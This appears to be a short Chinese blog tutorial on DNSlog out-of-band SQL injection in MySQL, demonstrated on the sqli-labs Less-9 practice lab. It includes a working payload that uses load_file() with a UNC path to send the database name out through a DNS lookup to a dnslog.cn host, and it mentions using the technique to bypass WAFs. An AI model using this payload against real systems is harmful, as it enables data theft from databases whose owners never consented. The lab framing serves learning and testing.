目录
手动注入对waf的绕过有很大的帮助,但是效率比较低。
DNSlog手动注入的条件和文件上传注入一样,也需要mysql有文件的读写权限。
一,关键函数
load_file()
读取本机或者是在网络上共享出来的一些文件
二,UNC路径
格式:\severname\sharename,其中severname是服务器名,sharename是共享资源的名称。
扫描二维码关注公众号,回复:
14720013 查看本文章
三,需要用到的网站
http://www.dnslog.cn/
获取随机分配的域名:
可以在前面加东西进行访问:
然后我们在dnslog上点击refresh可以看到dns解析的日志信息:
四,注入
简单点说他的原理就是,在DNS解析域名之前现在它执行我想让他执行的数据库的命令。
在这里我们以时间盲注less-9为例:
?id=1 and (select load_file(concat("//",(select database()),".snen4t.dnslog.cn//hyc.txt")))
可以看到页面并没有响应,但是去查看dnslog中的日志:
实际上域名前面会显示database是security的呜呜呜但是不知道为什么没有显示,先放在这里吧...
